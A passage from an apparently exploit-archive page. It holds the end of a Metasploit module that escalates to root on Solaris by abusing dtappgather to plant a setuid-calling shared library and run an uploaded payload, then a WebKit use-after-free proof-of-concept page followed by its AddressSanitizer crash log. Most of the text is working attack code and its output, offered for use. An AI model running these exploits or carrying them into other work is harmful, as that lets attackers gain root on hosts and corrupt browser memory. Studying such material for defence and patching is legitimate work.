    depth.times do
      cmd_exec "DTUSERSESSION=.. /usr/dt/bin/dtappgather"
    end
    symlink locale_path, appmanager_path
    cmd_exec "DTUSERSESSION=#{locale_name} #{dtappgather_path}"
    unless cmd_exec("ls -al #{locale_path} | grep #{locale_name}").to_s.include? locale_name
      fail_with Failure::NotVulnerable, "Could not create directory #{new_dir}"
    end

    print_good "Created directory #{new_dir}"
    register_dir_for_cleanup new_dir

    rm_f appmanager_path
    cmd_exec "chmod 755 #{new_dir}"

    # Upload and compile shared object
    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    mkdir base_path

    payload_name = ".#{rand_text_alphanumeric 5..10}"
    payload_path = "#{base_path}/#{payload_name}"

    so = <<-EOF
      void __attribute__((constructor)) cons() {
        setuid(0);
        setgid(0);
        execle("#{payload_path}", "", 0, 0);
        _exit(0);
      }
    EOF

    so_name = ".#{rand_text_alphanumeric 5..10}"
    so_path = "#{base_path}/#{so_name}"
    upload_and_compile so_path, so

    vprint_status "Writing shared objects to #{new_dir}"
    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.2'"
    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.2"
    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.3'"
    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.3"

    # Upload and execute payload
    upload payload_path, generate_payload_exe
    cmd_exec "chmod +x #{payload_path}"

    print_status 'Executing payload...'
    cmd_exec "LC_TIME=#{locale_name} #{suid_bin_path} & echo "
  end
end
HireHackking 
<!--
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233006 on OSX.

Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.

PoC:

=================================================================
-->

<script>
function jsfuzzer() {
 var a;
 for(var i=0;i<100;i++) {
   a = new Uint8Array(1024*1024);
 }
 document.implementation.createHTMLDocument("doc");
}
function eventhandler4() {
try { htmlvar00007.remove(); } catch(e) { }
}
</script>
<body onload=jsfuzzer()>
<select id="htmlvar00007" onblur="eventhandler4()" autofocus="autofocus" min="1" align="Right">
</select>
<button id="htmlvar00013" autofocus="autofocus" formmethod="post" formnovalidate="formnovalidate" formmethod="post" formtarget="htmlvar00004" inner="1" valign="middle">

<!--
=================================================================

ASan log:

=================================================================
==69238==ERROR: AddressSanitizer: heap-use-after-free on address 0x6120000aaa54 at pc 0x0003280b861a bp 0x7ffee59e6500 sp 0x7ffee59e64f8
READ of size 4 at 0x6120000aaa54 thread T0
==69238==WARNING: invalid path to external symbolizer!
==69238==WARNING: Failed to use and restart external symbolizer!
    #0 0x3280b8619 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619)
    #1 0x329d81138 in WebCore::nodeHasRole(WebCore::Node*, WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d81138)
    #2 0x329d89d7d in WebCore::AXObjectCache::handleMenuItemSelected(WebCore::Node*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d89d7d)
    #3 0x329d8a34a in WebCore::AXObjectCache::handleFocusedUIElementChanged(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d8a34a)
    #4 0x329d9a9a1 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9a9a1)
    #5 0x32af69d1d in WebCore::FrameViewLayoutContext::runAsynchronousTasks() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f69d1d)
    #6 0x32af6a45a in WebCore::FrameViewLayoutContext::runOrScheduleAsynchronousTasks() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f6a45a)
    #7 0x32af4219e in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f4219e)
    #8 0x32af5b272 in WebCore::FrameView::updateContentsSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f5b272)
    #9 0x32b10c413 in WebCore::ScrollView::updateScrollbars(WebCore::IntPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x310c413)
    #10 0x32b10ec3f in WebCore::ScrollView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x310ec3f)
    #11 0x32af4785b in WebCore::FrameView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f4785b)
    #12 0x32af3e426 in WebCore::FrameView::adjustViewSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f3e426)
    #13 0x32af42099 in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f42099)
    #14 0x32a452779 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2452779)
    #15 0x32ad4a367 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d4a367)
    #16 0x32ad485ac in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d485ac)
    #17 0x32a4757a2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24757a2)
    #18 0x32aa9dfd4 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9dfd4)
    #19 0x32ad2eb0b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2eb0b)
    #20 0x32acf81e9 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf81e9)
    #21 0x32ae3a0c7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e3a0c7)
    #22 0x32ae36b4e in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e36b4e)
    #23 0x32adce18e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce18e)
    #24 0x10b01d87b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
    #25 0x10b021e06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
    #26 0x10b0210fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
    #27 0x10a602ea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
    #28 0x10a375b7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
    #29 0x10a37701e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)
    #30 0x3379e53c7 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8f3c7)
    #31 0x3379e5e46 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fe46)
    #32 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
    #33 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
    #34 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
    #35 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
    #36 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
    #37 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
    #38 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
    #39 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
    #40 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
    #41 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
    #42 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
    #43 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
    #44 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
    #45 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
    #46 0x10a2164c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
    #47 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)

0x6120000aaa54 is located 20 bytes inside of 296-byte region [0x6120000aaa40,0x6120000aab68)
freed by thread T0 here:
    #0 0x10e3c8fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
    #1 0x337a588e1 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1028e1)
    #2 0x32a99c01b in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<296u>, WebCore::HTMLSelectElement>(bmalloc::api::IsoHeap<WebCore::HTMLSelectElement>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x299c01b)
    #3 0x339f295a5 in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d35a5)
    #4 0x339f2965a in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d365a)
    #5 0x339f26c8b in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d0c8b)
    #6 0x339f2058a in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25ca58a)
    #7 0x339ed612e in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x258012e)
    #8 0x339ed5d37 in JSC::JSDestructibleObjectHeapCellType::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x257fd37)
    #9 0x339641df9 in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cebdf9)
    #10 0x339637ada in JSC::LocalAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1ada)
    #11 0x339637796 in JSC::LocalAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1796)
    #12 0x3396371f0 in JSC::LocalAllocator::allocateSlowCase(JSC::GCDeferralContext*, JSC::AllocationFailureMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce11f0)
    #13 0x329f03246 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f03246)
    #14 0x329f02c29 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02c29)
    #15 0x329f02b6b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02b6b)
    #16 0x329f111b1 in WebCore::toJSNewlyCreated(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f111b1)
    #17 0x32854d915 in WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x54d915)
    #18 0x32851fef7 in long long WebCore::IDLOperation<WebCore::JSDOMImplementation>::call<&(WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51fef7)
    #19 0x5ce5f014176  (<unknown module>)
    #20 0x337a67d08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #21 0x337a67d08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #22 0x337a6133a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
    #23 0x3397d0964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
    #24 0x339da25b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
    #25 0x339da274b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
    #26 0x339da2af1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
    #27 0x329eac6b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
    #28 0x329efab9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
    #29 0x32a5399ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)

previously allocated by thread T0 here:
    #0 0x10e3c8a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
    #2 0x337a44a84 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeea84)
    #3 0x337a587dc in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1027dc)
    #4 0x32a99bc19 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<296u>, WebCore::HTMLSelectElement>(bmalloc::api::IsoHeap<WebCore::HTMLSelectElement>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x299bc19)
    #5 0x32a98b873 in WebCore::HTMLSelectElement::create(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x298b873)
    #6 0x3282a61ae in WebCore::selectConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a61ae)
    #7 0x32829a09f in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29a09f)
    #8 0x32aa99c58 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a99c58)
    #9 0x32aa98c8c in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98c8c)
    #10 0x32aa99619 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a99619)
    #11 0x32aaec9bc in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aec9bc)
    #12 0x32aae86c7 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae86c7)
    #13 0x32aae5cee in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae5cee)
    #14 0x32aa9f5cc in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f5cc)
    #15 0x32aa9f15a in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f15a)
    #16 0x32aa9e364 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9e364)
    #17 0x32aa9fed7 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9fed7)
    #18 0x32a438c2e in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2438c2e)
    #19 0x32ad2eab3 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2eab3)
    #20 0x32acf81e9 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf81e9)
    #21 0x32ae3a0c7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e3a0c7)
    #22 0x32ae36b4e in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e36b4e)
    #23 0x32adce18e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce18e)
    #24 0x10b01d87b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
    #25 0x10b021e06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
